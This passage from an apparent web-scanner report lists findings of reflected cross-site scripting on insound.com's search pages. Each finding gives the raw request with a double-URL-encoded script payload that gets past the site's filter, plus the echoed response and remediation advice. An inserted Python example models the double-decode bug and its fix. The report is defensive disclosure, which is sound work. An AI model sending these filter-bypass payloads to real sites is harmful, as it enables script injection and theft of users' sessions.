Set-Cookie: CFTOKEN=452170903; expires=Sun, 09-Jan-2011 02:38:59 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Camu Tao2a5b5</title><script>alert(1)</script>2927d88952d</title>
...[SNIP]...

1.37. http://www.insound.com/search/query/Can&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Can&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 65603%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e50650aabab5 was submitted in the REST URL parameter 3. This input was echoed as 65603</title><script>alert(1)</script>50650aabab5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Can65603%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e50650aabab5&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=vmh6746njq1me99iu3te4fr6p1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:13 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=79145739; expires=Sun, 09-Jan-2011 02:39:13 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=228249256; expires=Sun, 09-Jan-2011 02:39:13 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Can65603</title><script>alert(1)</script>50650aabab5</title>
...[SNIP]...

1.38. http://www.insound.com/search/query/Can&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Can&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea5c0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef119ed9a7d2 was submitted in the REST URL parameter 3. This input was echoed as ea5c0"><script>alert(1)</script>f119ed9a7d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Canea5c0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef119ed9a7d2&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=t7609m2h4b1k0182tmt82gjch6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:07 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=236130198; expires=Sun, 09-Jan-2011 02:39:07 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=127330716; expires=Sun, 09-Jan-2011 02:39:07 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Canea5c0"><script>alert(1)</script>f119ed9a7d2" />
...[SNIP]...

1.39. http://www.insound.com/search/query/Canada&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Canada&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload bc8f0%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e480ac429de0 was submitted in the REST URL parameter 3. This input was echoed as bc8f0</title><script>alert(1)</script>480ac429de0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Canadabc8f0%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e480ac429de0&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=se0s73ibgvtoijplq86lusfnd6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:05 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=272316181; expires=Sun, 09-Jan-2011 02:39:05 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=290681254; expires=Sun, 09-Jan-2011 02:39:05 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Canadabc8f0</title><script>alert(1)</script>480ac429de0</title>
...[SNIP]...

1.40. http://www.insound.com/search/query/Canada&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Canada&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f39f2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1796f582d98 was submitted in the REST URL parameter 3. This input was echoed as f39f2"><script>alert(1)</script>1796f582d98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Canadaf39f2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1796f582d98&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=b1cjdqp1f9f08siseh0gk9s2n1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:57 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=209606677; expires=Sun, 09-Jan-2011 02:38:57 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=397519922; expires=Sun, 09-Jan-2011 02:38:57 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Canadaf39f2"><script>alert(1)</script>1796f582d98" />
...[SNIP]...

1.41. http://www.insound.com/search/query/Candace%20Pederson&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candace%20Pederson&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 321b4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e355ae165837 was submitted in the REST URL parameter 3. This input was echoed as 321b4</title><script>alert(1)</script>355ae165837 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Candace%20Pederson321b4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e355ae165837&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=pvh0rpgqvpsvci5pigsk9rrdo4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:06 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=139125292; expires=Sun, 09-Jan-2011 02:39:06 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=46557056; expires=Sun, 09-Jan-2011 02:39:06 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Candace Pederson321b4</title><script>alert(1)</script>355ae165837</title>
...[SNIP]...

1.42. http://www.insound.com/search/query/Candace%20Pederson&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candace%20Pederson&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54cbd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4ac25f5a8ae was submitted in the REST URL parameter 3. This input was echoed as 54cbd"><script>alert(1)</script>4ac25f5a8ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Candace%20Pederson54cbd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4ac25f5a8ae&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1pmdiqolr6lv3j76kq2chdo2j1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:57 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=156228455; expires=Sun, 09-Jan-2011 02:38:57 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=490159533; expires=Sun, 09-Jan-2011 02:38:57 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Candace Pederson54cbd"><script>alert(1)</script>4ac25f5a8ae" />
...[SNIP]...

1.43. http://www.insound.com/search/query/Candi%20Staton&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candi%20Staton&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload d3a39%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e53c4a837866 was submitted in the REST URL parameter 3. This input was echoed as d3a39</title><script>alert(1)</script>53c4a837866 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Candi%20Statond3a39%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e53c4a837866&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=97h0ful2soj74sn6lk9vectt37; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:19 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=143714990; expires=Sun, 09-Jan-2011 02:39:19 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=152065294; expires=Sun, 09-Jan-2011 02:39:19 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Candi Statond3a39</title><script>alert(1)</script>53c4a837866</title>
...[SNIP]...

1.44. http://www.insound.com/search/query/Candi%20Staton&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candi%20Staton&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29567%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e19070c0b8ec was submitted in the REST URL parameter 3. This input was echoed as 29567"><script>alert(1)</script>19070c0b8ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Candi%20Staton29567%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e19070c0b8ec&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=ic6g2ebsfgriu5vlsh8n0cl7o1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:11 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=309731527; expires=Sun, 09-Jan-2011 02:39:11 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=93914654; expires=Sun, 09-Jan-2011 02:39:11 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Candi Staton29567"><script>alert(1)</script>19070c0b8ec" />
...[SNIP]...

1.45. http://www.insound.com/search/query/Candie%20Hank&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candie%20Hank&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 4cfb7%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebd5d95a1ca4 was submitted in the REST URL parameter 3. This input was echoed as 4cfb7</title><script>alert(1)</script>bd5d95a1ca4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Candie%20Hank4cfb7%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebd5d95a1ca4&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=crfnjce70t07f7pvepefkf1pi5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:10 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=232920607; expires=Sun, 09-Jan-2011 02:39:10 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=290049157; expires=Sun, 09-Jan-2011 02:39:10 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Candie Hank4cfb7</title><script>alert(1)</script>bd5d95a1ca4</title>
...[SNIP]...

1.46. http://www.insound.com/search/query/Candie%20Hank&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candie%20Hank&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96840%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec0727089e40 was submitted in the REST URL parameter 3. This input was echoed as 96840"><script>alert(1)</script>c0727089e40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Candie%20Hank96840%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec0727089e40&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=qchke8bcrmn2rrg225tlrf9u91; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:04 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=298989875; expires=Sun, 09-Jan-2011 02:39:04 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=297735959; expires=Sun, 09-Jan-2011 02:39:04 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Candie Hank96840"><script>alert(1)</script>c0727089e40" />
...[SNIP]...
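The issue and remediation text above describes the mechanism in words. The following Python model is added here and is not code from insound.com or from the scanner; it stands in for the unseen PHP handler and shows why the double-encoded probe slips past a character filter, and how a handler that decodes once and HTML-encodes at the output sink stops it. The blacklist, the handler names and the second decode are assumptions; only the probe and the reflected fragments are taken from finding 1.46.

```python
"""
Added example, not insound.com's code or the scanner's: a minimal model of
the double-decode bug in findings 1.46 onward, next to a hardened handler.

Assumptions (not stated in the report): the application runs a character
blacklist on the value it receives, then percent-decodes it a second time,
then writes it unescaped into <title> and into a hidden <input value="...">.
Only the probe and the reflected fragments are taken from finding 1.46.
"""
import html
from urllib.parse import unquote

BLOCKED = '<>"'   # assumed naive blacklist of the kind the scanner reports


def apache_decodes_once(raw_path_segment: str) -> str:
    """The web server percent-decodes the path once before the application
    sees it: %2522 becomes %22 and %253c becomes %3c."""
    return unquote(raw_path_segment)


def render(query: str) -> str:
    """The two reflection points shown in the report's response snippets."""
    return (f"<title>{query}</title>\n"
            f'<input type="hidden" name="query" value="{query}" />')


def vulnerable_handler(raw_path_segment: str) -> str:
    q = apache_decodes_once(raw_path_segment)
    if any(c in q for c in BLOCKED):   # filter sees "%22" and "%3c": passes
        return render("")
    q = unquote(q)                     # BUG 1: second decode yields " and <
    return render(q)                   # BUG 2: no output encoding at the sink


def hardened_handler(raw_path_segment: str) -> str:
    q = apache_decodes_once(raw_path_segment)   # decode once, never again
    # The real fix is output encoding at the sink. quote=True turns " into
    # &quot; as well, so one escape covers both the element-text context of
    # <title> (where </title> must never appear) and the double-quoted
    # attribute value. The blacklist becomes a secondary control at most.
    return render(html.escape(q, quote=True))


def fully_decoded(s: str, limit: int = 5) -> str:
    """Repeat percent-decoding until the value stops changing, so a check
    sees the same characters the application would eventually act on."""
    for _ in range(limit):
        d = unquote(s)
        if d == s:
            return s
        s = d
    return s


def validate_after_canonicalisation(raw_path_segment: str) -> bool:
    """Second half of the remediation: if the application insists on extra
    decoding, validate the fully canonicalised value, not the raw one."""
    return not any(c in fully_decoded(raw_path_segment) for c in BLOCKED)


# Path segment from the request in finding 1.46 (double-encoded probe).
PROBE = ("Candie%20Hank96840%2522%253e%253cscript%253ealert%25281%2529"
         "%253c%252fscript%253ec0727089e40")
# The same break-out encoded only once: the blacklist catches this one.
SINGLE = "Candie%20Hank%22%3e%3cscript%3e"

if __name__ == "__main__":
    print(vulnerable_handler(PROBE))   # reflects "><script>alert(1)</script>
    print(vulnerable_handler(SINGLE))  # blocked: empty query rendered
    print(hardened_handler(PROBE))     # no markup, %XX text survives harmlessly
    print(hardened_handler(SINGLE))    # &quot;&gt;&lt;script&gt;
```

Running it reproduces the exact `<input ... value="Candie Hank96840"><script>alert(1)</script>c0727089e40" />` line from the response in 1.46 for the vulnerable handler, while the hardened handler emits the probe as inert text in both contexts.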

1.47. http://www.insound.com/search/query/Candlebox%20&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candlebox%20&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload b7dab%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e41e17648200 was submitted in the REST URL parameter 3. This input was echoed as b7dab</title><script>alert(1)</script>41e17648200 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

The application appears to URL-decode the value of REST URL parameter 3 a second time after the web server has already decoded it once; that second decode is what turns %253c back into <, so it should be removed. If some further decoding is genuinely required, perform input validation only after all canonicalisation is complete, never on the raw value. Independently of any validation, HTML-encode the value at the point it is written into the page: both the element text inside TITLE tags and the double-quoted attribute value need at least <, >, " and & encoded.

Request

GET /search/query/Candlebox%20b7dab%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e41e17648200&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
